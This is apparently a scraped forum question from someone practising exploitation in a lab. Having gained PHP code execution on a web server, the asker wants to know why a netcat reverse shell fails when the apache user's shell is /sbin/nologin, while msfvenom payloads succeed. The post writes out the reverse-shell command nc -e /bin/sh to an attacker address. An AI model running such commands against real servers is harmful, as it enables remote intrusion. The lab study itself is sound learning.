Does having /sbin/nologin mean I cannot start the /bin/sh executable?

While practicing exploitation on a lab, I managed to get the ability to execute php code which allowed me to execute system commands through shell_exec on a web server. The apache user has /sbin/nologin assigned as its shell.
I have tried using the command nc -e /bin/sh [ip] [port] but it fails. Using netcat without starting a shell, however, succeeds. I assumed that this was because having the shell set to /no/login means I cannot start it. However, if I use an executable that performs execve("/bin/sh") such as those found in msfvenom payload executables, it succeeds.

Another reason I assumed the nologin shell disallows a user to start an interactive shell is because trying the netcat reverse shell with a user who has /bin/sh configured as its shell succeeds. I am confused what phase checking for permissions to start a shell begins because I am still able to start it through binary executables.


Category: php Time: 2016-07-31 Views: 10

Related post

iOS development

Android development

Python development

JAVA development

Development language

PHP development

Ruby development


Front-end development


development tools

Open Platform

Javascript development

.NET development

cloud computing


Copyright (C), All Rights Reserved.

processed in 0.165 (s). 12 q(s)